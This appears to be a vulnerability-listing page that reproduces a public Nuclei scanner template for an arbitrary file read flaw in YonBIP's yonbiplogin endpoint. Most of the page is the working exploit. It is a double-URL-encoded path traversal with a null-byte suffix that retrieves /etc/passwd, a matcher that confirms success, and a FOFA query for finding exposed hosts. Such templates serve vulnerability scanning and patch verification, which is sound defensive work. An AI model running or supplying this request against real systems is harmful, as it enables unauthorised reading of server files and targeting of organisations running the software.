yonyou-yonbip-lfi: YonBIP - Arbitrary File Read

日期: 2025-08-01 | 影响软件: yonyou-yonbip-lfi | POC: 已公开

漏洞描述

There is an arbitrary file reading vulnerability in yonbiplogin, the advanced version of YonBIP

PoC代码[已公开]

id: yonyou-yonbip-lfi

info:
  name: YonBIP - Arbitrary File Read
  author: l1b3r
  severity: high
  description: |
    There is an arbitrary file reading vulnerability in yonbiplogin, the advanced version of YonBIP
  reference:
    - https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BYonBIP%E9%AB%98%E7%BA%A7%E7%89%88yonbiplogin%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="YonBIP" || title="数字化工作台"
  tags: yonyou,yonbip,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png.js"

    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - 'contains(content_type, "application/javascript")'
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022100ba61a3169128f1c458c36eafb9457fd2a7bdf51647c6b397f270d01c480e4b00022055a5c98f5b44a3ea808335d60d817b5092194677d3d35e9b60411452ba21e0d3:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/yonyou/yonyou-yonbip-lfi.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐